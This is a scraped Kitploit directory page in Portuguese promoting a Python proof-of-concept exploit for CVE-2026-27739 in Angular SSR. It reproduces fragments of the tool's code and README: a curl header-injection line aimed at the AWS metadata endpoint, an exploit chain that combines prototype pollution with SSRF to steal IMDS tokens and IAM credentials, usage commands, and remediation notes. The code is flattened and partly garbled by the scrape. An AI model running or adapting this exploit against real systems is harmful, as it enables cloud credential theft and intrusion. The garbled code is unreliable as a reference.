Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-27739-POC — PoC em Python explorando CVE-2026-27739 no Angular SSR: injeção de cabeçalho via poluição de protótipo e encadeamento de SSRF com AWS IMDS/GCP metadata para roubo de credenciais. | Kitploit
Ferramentas/GitHubGitHub/mr-redoo7/cve-2026-27739-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de PenetraçãoSegurança de API
GitHubmr-redoo7/cve-2026-27739-poc

CVE-2026-27739-POC

PoC em Python explorando CVE-2026-27739 no Angular SSR: injeção de cabeçalho via poluição de protótipo e encadeamento de SSRF com AWS IMDS/GCP metadata para roubo de credenciais.

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

-CVE-2026-27739-poc

curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}

2. Injeção de Cabeçalho via Prototype Pollution (CVSS: 7.5)

Descrição: O Angular SSR processa parâmetros de consulta inseguros que afetam a cadeia de protótipos Impacto: Manipulação de cabeçalhos de requisição, possível encadeamento de SSRF

Remediação

  1. Remover/desativar o processamento de cabeçalhos X-Forwarded-* ou usar uma whitelist de proxies conhecidos
  2. Implementar validação estrita de URL antes de operações propensas a SSRF
  3. Usar express-validator ou similar para sanitização de cabeçalhos
  4. Desativar endpoints de metadados da AWS/GCP ou usar IMDSv2 com hop limit """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report)

def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")

root@kitploit:~
args = parser.parse_args()

exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)

print(f"[+] Targeting: {args.target}")
print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")

# Execute exploit chain
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()

if name == "main": main() Uso bash

Basic SSRF test

python3 angular_ssr_exploit.py https://target.com

With SSL bypass for self-signed certs

python3 angular_ssr_exploit.py https://target.com --no-ssl-verify Como Funciona Teste de Injeção de Cabeçalho: Envia payloads de prototype pollution e cabeçalhos forwarded inseguros que o Angular SSR pode processar de forma insegura Cadeia SSRF: Testa o acesso ao AWS IMDS, metadados do GCP, serviços localhost via X-Forwarded-For/X-Original-URL Extração de Token IMDSv2: Encadeia SSRF para roubar tokens de metadados da AWS e depois credenciais IAM Relatório Automatizado: Gera relatório de pentest com pontuação CVSS e PoCs Detalhes Técnicos Causa Raiz: Aplicações Angular Universal SSR frequentemente encaminham req.headers diretamente para APIs internas sem sanitização:

javascript

// Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });

Baixar ferramenta